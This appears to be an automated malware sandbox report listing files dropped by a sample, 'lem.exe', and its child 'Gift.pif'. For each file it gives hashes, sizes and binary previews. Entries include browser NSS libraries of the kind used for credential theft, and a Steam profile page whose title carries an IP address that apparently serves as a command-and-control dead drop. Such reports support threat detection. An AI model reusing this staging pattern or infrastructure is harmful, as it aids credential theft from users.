                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\nss3.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2046288
                                                                        Entropy (8bit):6.787733948558952
                                                                        Encrypted:false
                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\softokn3.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):257872
                                                                        Entropy (8bit):6.727482641240852
                                                                        Encrypted:false
                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\vcruntime140.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):80880
                                                                        Entropy (8bit):6.920480786566406
                                                                        Encrypted:false
                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199747278259[1].htm

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):34740
                                                                        Entropy (8bit):5.400315708491517
                                                                        Encrypted:false
                                                                        SSDEEP:768:Adpqm+0Ih3tAA9CWGhOfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2r:Ad8m+0Ih3tAA9CWGhOFJTBv++nIjBtPH
                                                                        MD5:C87EA4F4F247F8F00D044A93C7B1C8C8
                                                                        SHA1:3BBCE34D625B839A8754DAEFD29EDB9DF04665F4
                                                                        SHA-256:280F2804D6CE0FB1C75C0531AC81EDDF778CA80D75BAD62DCBE75AC055F4DA70
                                                                        SHA-512:4426EF65F18E9559352FA35E517C77A9CCD2429318D4864FCDC881F75081D74DBA61FBE895F28309265769ACFA83EBD3A4A26BB2E8C4F5669404319FF0534255
                                                                        Malicious:false
                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://188.245.87.202|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h

                                                                        C:\Users\user\AppData\Local\Temp\366791\Gift.pif

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):893608
                                                                        Entropy (8bit):6.620254876639106
                                                                        Encrypted:false
                                                                        SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                        MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                        SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                        SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                        SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 7%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\366791\M

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:OpenPGP Secret Key
                                                                        Category:dropped
                                                                        Size (bytes):327012
                                                                        Entropy (8bit):7.999502073451394
                                                                        Encrypted:true
                                                                        SSDEEP:6144:x3mfBFUatTLlUC+1IwlxSkztcjIs0B4wtD3OpkeiKdLbRaia:F0Zz/wlJuGKwSiKd/RRa
                                                                        MD5:18F62E94867B896CFA8E11466571C57D
                                                                        SHA1:623C15C4520C8AFB7920A05B543FFED08EF0BEC1
                                                                        SHA-256:877A4011CB5C924756363E451C752BE5931945CD2077FBB56CFBBA29F3A3D6DE
                                                                        SHA-512:F148144E6684D9DE6516199E927F711A6CAC0B37907A6845F860BECE194CA0BCCC16BB11103401266D8B49F1D298800F12D2E1C4D6443B5B1D7BAA03AA4DCE97
                                                                        Malicious:false
                                                                        Preview:.u...."..QAm..b..n.>.....#..........(.<.._.Ir..-wj;'..|"..u..R....h.-F......."..0?.qH.}..,.....t..k?I$0%.7..&qS.4!gVclT.'i..d+;.@..E....L.h......eQC.O.....D......=..:K....Og.^!...?.}]...c..l.;.....+...z.0..."..&rD.'...2:L....+.H..y...3.....e@..E&... ...Go.My..b.\.|.$NP:>....9.4.Y.{..c.JC.P..."..>]|.^...;c...O......(5...6.G.Y. pQ.......(`A01....U...(..S..r".z.xOy..Q.^.^....8.O..q<..5&..F.Y......H3,.._Wx..9I..M2[.t...qL..w>NkayXcJhE..{H...K^...Z>.J..b...T..*(.../....5..-S..X.w2.,./.a.f.?.0.jc.n.b'mh.P...@.Ap.5..>.=.R.f`...u.........f..."J\ny./.......9&#h..Z.8..@...w.C.>z.z..g!.....S.C .J.p.5.J.w..............I...+..Z.{..D./._.....NEX..2.m..._.....D.*.kh...}].Yz\mx.&.@A...._....$K.=tD.v.E0. V...a....y...u.m...ZI-...5.Q1.g....p.G.W.?s.QX.G....(N..+.XQ*.gU.l..>h....4.@.-.'......z....O..d..b~..-..0;.7.N.N);..h.7.~L*.X.YD ..;.NFx.wC...%.....F.4.n..c........2!y.?..FT2..u.U.D.....A.eH.......rP..I.a'M.e.g...~y..S}...T.th.#..=...Jn..V...._.m..

                                                                        C:\Users\user\AppData\Local\Temp\Advertising

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):37888
                                                                        Entropy (8bit):6.670175721393079
                                                                        Encrypted:false
                                                                        SSDEEP:768:XnPml5Dhh/xGophpZddR6Bzyy3P8uMxworO4aIPxwW9iwczQqrQfy0cSoWtJyDTw:3PmfP/b/psgrO4aK9iwcznrQfy0c4cDM
                                                                        MD5:CA91AA4B24FBF692074F6B7C3744B716
                                                                        SHA1:9B10D76477DD84FE66E846F44BDBD08F5947DFA3
                                                                        SHA-256:A5526DDDD5E0EA2D1D4DA2F1E02A1526E6A55A6659AC7188951CAAF59355EB5E
                                                                        SHA-512:80941620390C3F4830F03C72F7284BE1C02FD361764B6537D84525BE97035C908C68629B938E1BEF2ACB6CE64CE263521169DB89683D3C159BC7C28C5D21DC50
                                                                        Malicious:false
                                                                        Preview:....s.3........;E.t8.E.<W@.}..E.;E...q.... .......t.;.....v..Vh9............E..}.....I..;....G...E...@..P.u.V.u..u...F..........G......}.9E.t.f.......f#......f;.u.....}.;}.w..G...M.........;U........F|.E.;...`..........}...}.t-..%....=....u.............%...............}................KK..........y.I..A.....E.hJ....."?J..F|.M.;........]......E.......t/..%....=....u!..G.......%..........E..........................KK..........y.I..A.....E.hJ....."?J............gJ.t..E..<G.E.;...l......E.u..].}........t ;.r.;.....v..Fh.............#....E.@.E.;E........%.......t.;.....v..Fh.................E..}.....G..;....E...E...@..P.u.V.u..u...D.........xE......}.9E................}...A...S.............$.p.D.;U........G..E..N|;...@....V..........u.F.PQ...A..............U........t.;V|r).~..u#.~..u.f..f;F4u..Fh........................}..U.;~|s!f.......f#......f;.u........}..U..E.@.E.;E...T.........V....+.;...o...f..f;F4..b.............U.f..f;F6..L.........M......}J;........N|.E.;.sB....}.;.

                                                                        C:\Users\user\AppData\Local\Temp\Ak

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):62464
                                                                        Entropy (8bit):6.518402019185416
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rqqdGYynTDYL7Q+mr9R2VgjGpS2Ehkjxx:eaGdDqeb2Xo2IkVx
                                                                        MD5:6F2B48A711ED46BFDBFF1F757796BB7F
                                                                        SHA1:5E25902829F80F4466374F5EA57E5C2882580D60
                                                                        SHA-256:10B792B6356593166D5C2D19C5AB78A5C4D88DF13C2E5C9DC21519C403F18A44
                                                                        SHA-512:61CAE43F9F1F759A76DA09D572B9031F9E580F77E7852D215562DBB593C304AB1C5A00B09EA2CFD63D999538F94DA301468D3E9C2106398728E4D8F45D0D326C
                                                                        Malicious:false
                                                                        Preview:L$4..L....D$0P.D$dWP..h......D$`.L$4P.{I..P.L$..v..j.S.D$.PV..r......L$...|...L$4..K...!.M.h..I..~...T$\j.j....H....*..._^3.[..]...U.......S.].VW.M..{..u..L,I....C..p.....{...F..8.C..0....{...F.......W...&x..Y<.u..M.......P. ~...8hL,I.W..e..YY.M...u.h..K...h..I...}...U.j.j....H......_^3.[..]...U.........SV3.W....$.....L$..|$...$......$......@...L$(..@...]..{..u..C..H...~....t..D$....3.L$..C..0....{...N..@.K...:........................C..0....z...v..L$..6J...L,I..L$.V......u2......P.L$...J..V.L$..lF...C..0...z...v..L$..4E...C..p....~z...v..L$,..I...L$(..}....t/.D$,.L$(HP.(C..f.8\t..u.....z..3..F.............C..p....)z...V..L$.3.S.t$...i..YY.........@j.........$.....v....t@j.........$.....iv....t(3.SP...H....A*...u....Iz...F............L$H.y>...L$h.p>...L$X.g>...L$8.^>...C..p....y...N..D$8P.D$.P.D$`P.T$t.H-......L$.3.P.)B..3.f9.u-Q.L$<..B..3.f9.u.h.K..L$...D..hL.K..L$<..D...D$hP.L$,.zH...D$XP.L$,.C...D$.P.L$,.C...D$8P.L$,.C...C..0....x...N..D$HP.T$,..p..Y.L$H.l..<.u.8D

                                                                        C:\Users\user\AppData\Local\Temp\Appendix

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):48663
                                                                        Entropy (8bit):6.842147975262886
                                                                        Encrypted:false
                                                                        SSDEEP:768:A2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:A2+9BBVgCOa1ZBPaPQaEwo0yv
                                                                        MD5:8DC888B7C0B738A1E0AB53D78BEB987C
                                                                        SHA1:E6A726461D4D982E6FF93CA43A3FC5BCC1E72024
                                                                        SHA-256:F716CFD3992DEDC91FD387460EEF10278ED02A3712ECD4D44DE47434D047B558
                                                                        SHA-512:5CF1E4C43A04C8250B96E91FE2227FB91B949092EF26227D634E465CCC29E5E735A212B6FF0BBABBC394CAB709FC873F6A87C576C79FE1E4255B800A5F46DB47
                                                                        Malicious:false
                                                                        Preview:.]...]...]...]...]...]...]...]...]...a......................................................]...]...]...]...]...]...]...]...]...]...]...]...v......................................]...]...]...]...]...]...]...]...]...]...]...]....................................k......................^...]...]...]...]...]...]...]...]...]...]...]...]..................................d...]...]...]...]...]...]...]...]...]...]...]...^........................k.....................................]...]...]...]...]...]...]...]...]...]...]...]...^...........................v...]...]...]...]...]...]...]...]...]...]...]...]...................................................................e...]...]...]...]...]...]...]...]...]...]...]...]...^.................l...]...]...]...]...]...]...]...]...]...]...]...]...d......................................................................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...].............

                                                                        C:\Users\user\AppData\Local\Temp\Automobile

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13312
                                                                        Entropy (8bit):2.04809099681218
                                                                        Encrypted:false
                                                                        SSDEEP:96:HunQmUO4IYoySAHbUJOfwq2QAyUHMqEP197gjV9kz76/IqRCH:H3LHPHTo1Q319sx9kaq
                                                                        MD5:45AC61695010B494AC7753A47211A9A6
                                                                        SHA1:87A75C97E7F99870AAD40B8A5BD98EDD453D4D5A
                                                                        SHA-256:1CAEC310BB5559F84C05061A93A7EC4DDD6D617192F7B8CF2F990913F23A4479
                                                                        SHA-512:B590BDABDD023A25CCFA0AB7D03860DA962CE4DD8A484AF5120BB8355FFF306B6F02D68B82CA74554970D99AFDE896DD837D3FBDC77539267D4B1C51DC4192E1
                                                                        Malicious:false
                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Beverages

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):36864
                                                                        Entropy (8bit):6.591474314445812
                                                                        Encrypted:false
                                                                        SSDEEP:768:y9Qywqp9sK1xhNGE0psu0nM8+aZKINulI1r:gMK1zN90psu0nMOKzlW
                                                                        MD5:AFE142FBAA8F964884B5E1B306E412F4
                                                                        SHA1:1FD19640B044E83DE5075B6320680307156EA217
                                                                        SHA-256:183F0C5F3BCDC8CF4AF78080681FE13D4AB8AAC8C167DBB8C2B8A440983B5EE2
                                                                        SHA-512:CB217FD62A4D0DCE5BBA5304CDE352CA3ED0D731381BB47E93633ACC7FCFF634EB4995A284A5B683A6BF1A90630F1D795E9B7D06FFC09C1D7D1E14412641DDE3
                                                                        Malicious:false
                                                                        Preview:.=...............A..$...A..u..u.R.V...........3.M..].jw..C...CX.].f9...q....._^[..].f.>p.....G...N..."..t.j ..+.[.....BKu.3.............G....E.3..t..b...3.....V........G..jw_.JF.......F...O......G..j.Y.M..Z.......9........G..j..ZH..j..SH...I.-.A.W.A...E...E...E...E...E...E...E.~.E.p.E...A.c.E...E...E.j.A...E...E.r.A.&.E.I.A...E...A.Q.A...E.9.A._.A.z.A.9.E.A.A...E...E...A................................................................................................... ....................................................U..QQSV..M.W.......>;.w:.E..E.3..C.........M.............G...}.....G...F._^[..].e......U........e..SVW.}.3..!......G...>ERCP...G...F....eG....F$..N&.....F"...F....N.E........F............N0.M...u..E.3.Pj....]....M............D.....H...........L.....@...j ..P....E.j.P.I`...F...D.............U.Q.M.P.M...YY3.A;........M..E.j..v....P........E................F..9].u...~MjL...gJ...3.Y..th.s @3....s...,....~.j 9}.t*.F..E.P.F.P..@...E......~;.N...F(.._

                                                                        C:\Users\user\AppData\Local\Temp\China

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):6.572783083155024
                                                                        Encrypted:false
                                                                        SSDEEP:384:eM1geStviK3YDejvRb0IyyZxSNBtFuskTdKvMxGHr4skzqs8cEaRYIbrHr1beQ+g:eM1gHYqj51rZxSNnLUshL5kf87wYeHZb
                                                                        MD5:A7D0496A90E3889A464F0860183E2570
                                                                        SHA1:9299475084EDB0361E1FE026AFBE3D2BED906001
                                                                        SHA-256:5542FD17FD4199D8BBAEF1D82115A9E1F1F17C5E6409B17C1DE92F00077E3557
                                                                        SHA-512:43093E7A6DD6ACAF6128E82439880F69D0676512D6951A7D2628964FD10B153DE59549BB97A1A9506366A16C871E00F3715695CF7CA7C6DA976CE05511870E52
                                                                        Malicious:false
                                                                        Preview:w0..X.I..w....Y.G.P..H.I....>J._.U...E..V.....>J.t.V...Y..^]...U..V.......E..t.V.q...Y..^]...Vj8......Y..t.V.......^.3.^.U..SVW...w.V..\.I..}..._.t".w..M..I....w..M..w.....P.&......V..`.I._^..[]...SVW...w.V..\.I..G4.0P..l.I.=....u.3.9_.t...V..`.I._^..[.U..S..VW.s.V..\.I..{..s..M.......s..M..s......P....s.j..s..:.......C.....V..`.I..._^[]...V..>.t..6..X.I..&.^.V..N.......N.......N.^.....U..W....u.!...j..u.j.R..\.I.PW..\.I.P..d.I._].............SVW..3.2.O ..t)........t.j.^...O..m....O .I.u...j...!w ...t...t.....9.O..F..../.O$..t(......t.......O..'....O$.I.u...j....g$..........t......u.!w._..^[.U.....SVWtM.].3.}.....t.9.u=.u.9.t4.E.9.t-..................j.......E...j..........YY..3._^[]...U......VW3..E......}..}...t..u...d.I..u......uI.>.._^..]....E.t!.u.....u.W.E.PV.u...h.I...uS......u...d.I..u.....t....t.j.....F...Y.Wh....j..E.Pj.h...@h@.K.....I......t...t....U.j......Y........E....d...U......VW3..E......}..}...t.j...d.I..u......uG.>.._^..].....t!.u.....u.W.E.P.u.V..h

                                                                        C:\Users\user\AppData\Local\Temp\Failing

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):6.283164421428037
                                                                        Encrypted:false
                                                                        SSDEEP:384:ZUi4kBM+bYXcqmjw0YhIR6s6bMkx875rLk+fBDsOc/WY7Jx2pQ44Gkvm:Q5eqMw0jR6s6bvx875rLjDsOc/WY7JxE
                                                                        MD5:83CC36E7D1F024E855DA1721F42EDEBE
                                                                        SHA1:8D958775289D4C52BB7035A7F6AB5C97AD47053C
                                                                        SHA-256:B6B2AC5A581567CB095A6519CF0AC50D20BFB5B0D95B69CCCACC84714A925C8A
                                                                        SHA-512:B0F0B6100580B5A4AD7C506F8D6F797F7D8AAD8D1016983BAE0F0ABF10A54D60CAA74C4AD95272282CCE46DD8609C1BABBB8652D0F7E2C3383D35946E7C0811D
                                                                        Malicious:false
                                                                        Preview:.......;.......3.............E..<}....;.~......3...4.+......;.....#...i...G.......v.;.r..V....P..E....~....I...@..fD..fD..fD..fD..}...M.u.j.j.j.j.j.3.........c...+..~.....T....E..E..E..E..E..E..............F(.F(;F,...`........ gJ...C....K.]......E........].E.E..S..M.@P.u.V.u..u..c.........tL= ...u%..K...K9...........f.;wt.f.9w..................C...C......f.;wt..M..........M.........f;.t...w........C.f.<Cw..Ct.f.;x.............U..E...M...;E...{]......].....E......E....E........E.....+Ft...E.......E......r...........E..M.@P.u....V.u.... gJ..u...C.O..........................M.E..Ft.E.......H.......E.......9E........E....C.....E.f.;v.......=$.L.........d.........C...h....F...l....Fx..p....F|+Fx....t....E.+Fx....x....E.+Fx....|.....C..E...C..E..E..+....E.........E...u..E............E........E...d...P..$.L..................U..E........E....3.E..s....M..............D..$...D.................C.=..........;A.t{3..t...9.......h.....K...N$.F0..H..K..E....H..........E..

                                                                        C:\Users\user\AppData\Local\Temp\Gamma

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):4.975702259687121
                                                                        Encrypted:false
                                                                        SSDEEP:384:4mE5lTbyuT2sWjtudNIDvFQC7VkxhPfp2hu9i09PrOa3Hww8:4mEusWjcd+DvFQC7VkrHpIu9xhSaAw8
                                                                        MD5:F68968CD4FA1D7D4466A5DCE6F4C84F6
                                                                        SHA1:EA8C31DA0FC2B05E7CDD63AFF5901D44D238D037
                                                                        SHA-256:ACF7387994A2158A43CE481FE01F854AF5E43F7E4ACD078C5A0DABAD9891E43D
                                                                        SHA-512:9BB47D45FBFB03990F2A795E9F14A5082E00E30543A4A03C4853F8D181FE6A58755FCFDD70BD213C3DF547F72AB2B54C71A0DBFEBAB429036435B51223211E38
                                                                        Malicious:false
                                                                        Preview:unMonTueWedThuFriSat...JanFebMarAprMayJunJulAugSepOctNovDec....TZ............J..... .J.....(.J.....0.J.....@.J.....H.J.....P.J.....X.J.....`.J.....h.J.....p.J.....x.J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J.......J. .....J.!.....J."... .J.#...(.J.$...0.J.%...8.J.&...@.J.'...H.J.)...P.J.*...X.J.+...`.J.,...h.J.-...p.J./...x.J.6.....J.7.....J.8.....J.9.....J.>.....J.?.....J.@.....J.A.....J.C.....J.D.....J.F.....J.G.....J.I.....J.J.....J.K.....J.N.....J.O.....J.P.....J.V.....J.W.....J.Z... .J.e...(.J.......I.....0.J.....<.J.....H.J.....X?I.....T.J.....`.J.....l.J.....x.J......BI.......J.......J.......J.......J.......J.......J.....4?I.....L?I.......J.......J.......J.......J.......J.......J.......J..... .J.....,.J.....8.J.....D.J.....P.J. ...\.J.!...h.J."...t.J.#.....J.$.....J.%.....J.&.....J.'.....J.).....J.*.....J.+.....J.,.....J.-.....J./.....J.2.....J.4.....J.5...(.J.6...4.J.7...@.J.8...L.J.9

                                                                        C:\Users\user\AppData\Local\Temp\Granted

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:MMDF mailbox
                                                                        Category:dropped
                                                                        Size (bytes):27648
                                                                        Entropy (8bit):6.913742648072757
                                                                        Encrypted:false
                                                                        SSDEEP:384:g6HDyOpbM136KeBzC6GFe46JRoGWbHkdzfkfiCbwHmAjesFUpa:gcDP8WBosd0bHazf0Tye4UA
                                                                        MD5:12599D2A0D8467DBC2722468687E36FD
                                                                        SHA1:F35F416FED0A6EDDE8329B90C89FB139338EFE6C
                                                                        SHA-256:A16AF249569396606BCC03F0E2B828187E40E1F507EF07E8150CA1A439D47C20
                                                                        SHA-512:7E17C23FEE183B223E5017D89FDAF15064DED3DD242C7153E8526C579A521862EAEF63E014DC48F392718FA9138546D75137C5C0680F6EACBD711A69AD2DF43A
                                                                        Malicious:false
                                                                        Preview:........!EEEEEK..wEEEEEEEEEEEEEEEEEEEx..4................u.......=..................>v..8*...............q)....jr.s.................t....<................l.....m.nV...............o.....p................g'.....h.ij............._k.....E.................^_....`a.bcccccde>.....f......LM.................Z.....[........\.....]8.......S.................8V..................WX........Y..................TM..........U................5........N..........O......P...Q.....RH.........S....................F.....GH.I.....JK.........LM....................;:.....BC2.....D..........E......................=>....2?.....@...........A.......................9..........:;...........<........................5........67...........8*........................12.......3............4............,-.................../.............0...........................()...*+............"...............!............."#$%&.............'.............................................. .................................................

                                                                        C:\Users\user\AppData\Local\Temp\Hi

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):55296
                                                                        Entropy (8bit):6.478568072936293
                                                                        Encrypted:false
                                                                        SSDEEP:768:9RH7ACViIeTxYEhqHGnqA1sojvqt0hDthFb0GuCsuYCV5mhzw4NKCFOsQW+Bfm4G:96CV21YEsmnq7Cv/+/Coc5m+4Xf8O46t
                                                                        MD5:E7A924FF527BD91CA864A5E47D7D57D7
                                                                        SHA1:E989789DC0F5EE0D5EDB7CC99AF17EF937328FF6
                                                                        SHA-256:9949938D88359593913780498287069B7B8147D59AFC036EE9D9DF39237008C9
                                                                        SHA-512:137B75CC4D24FB03A03A2B4CACB74B054E5CF075D4C8957387C689614D2BC4CDA1935FE4635F3512F268C6558C82DC8B55DA92D11A7564EC0818EBA2B6D55F2C
                                                                        Malicious:false
                                                                        Preview:C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y.

                                                                        C:\Users\user\AppData\Local\Temp\Immigrants

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):33792
                                                                        Entropy (8bit):6.659803565930362
                                                                        Encrypted:false
                                                                        SSDEEP:768:KlRKw4sWGuv6crjQAVlvZEx2zinQD2tR/i01g:Klao/RIs2ziQD2tR/i0+
                                                                        MD5:1852895869138CA95C88B6D2ACAF35E4
                                                                        SHA1:BF4665E82C3D713305EE890F92C4622DC42BF31E
                                                                        SHA-256:443A1E33174C5F6C5AFB73E58DBF6D7CD9957F96AF924478C13D13FCABA4BB1C
                                                                        SHA-512:34296090D08A68FDE2397C010755C668A63736046C4D2A10B0490C75893DFD9B1CC300BE6261479ED692D4ED202C1CCA474010B162AEDD82511FC2BD632889D2
                                                                        Malicious:false
